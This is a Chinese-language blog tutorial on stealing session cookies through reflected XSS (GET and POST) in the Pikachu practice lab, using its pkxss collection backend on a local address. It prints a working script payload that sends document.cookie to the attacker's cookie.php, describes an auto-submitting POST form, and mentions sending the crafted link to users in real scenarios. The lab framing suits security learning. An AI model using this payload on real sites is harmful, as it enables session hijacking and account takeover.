Web安全之利用XSS漏洞进行cookie获取

攻击者后台的搭建

首先我们搭建攻击者后台用于接收我们获取到的cookie信息,这里我们用的后台是是pikachu自带的pkxss后台

打开pikachu网址找到管理工具点开xss后台

 

 

接着再点击安装初始化即

 

 

点击进入首页,输入账号密码登入就完成了

 

 

 

get型xss:获取cookie


攻击流程图:

 

 

 

 这里我的攻击者服务器受害者服务器和漏洞服务器都为127.0.0.1:801

 

 

由于每个攻击者端口不同,这里我们要修改pkxss后台文件中的xampp\htdocs\pkxss\xcookie下的cookie.php文件

将其中的ip地址修改为漏洞服务器地址

 

 

 接着再另一个页面中打开pikachu登入到pkxss的后台

 

 

 

 接着开始get型xss的利用,打开pikachu的反射型xss(get)页面,这里我们准备一个js的payload

<script>document.location='http://127.0.0.1:801/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

这段js代码利用DOM里面的document.location的实例来做一个重定向,一旦用户去访问页面这段js就会去访问我们pkxss的后台,访问时顺便把cookie给带过去

而且利用了DOM里面的document.cookie来获取本地的cookie(ps:反射型xss(get)输入框有字符数量限制,之前又说过如果解决)

然后将这段js代码输入提交即可

 

点提交之后页面跳到了首页,这时我们已经成功获取到了用户的cookie了

然后我们来到之前打开的pkxss页面,点开cookie搜集刷新一下页面

 

 

在实际场景当中我们可以把这段URL发送给用户,一旦用户在浏览器里面访问了这个链接,用户的cookie就会被发送到我们的后台

 

 

 post型xss:获取cookie

其实和反射型的xss一样的,只是提交post方式提交的,并不会在URL里面传送参数 ,所以我们无法将我们的恶意代码嵌到URL里面去发送给目标,我们可以在bp里抓包查看一下

 

 

 

攻击原理流程图

 

 

 首先我们点到反射型XSS(post)页面登入一下

 

 

接着pkxss的文件\xampp\htdocs\pkxss\xcookie的post-html中的漏洞服务器器和攻击者服务器修改成我们的自己的地址

 

这样我们这个自动提交post表单的页面就构造好了

只要我们让用户点这个这个我们构造好的会自动提交post请求的表单就可以获取到用户cookie

http://127.0.0.1:801/pikachu/pkxss/xcookie/post.html

 

posted @ 2020-07-05 23:15  墨尐丶小傲  阅读(2956)  评论(0编辑  收藏  举报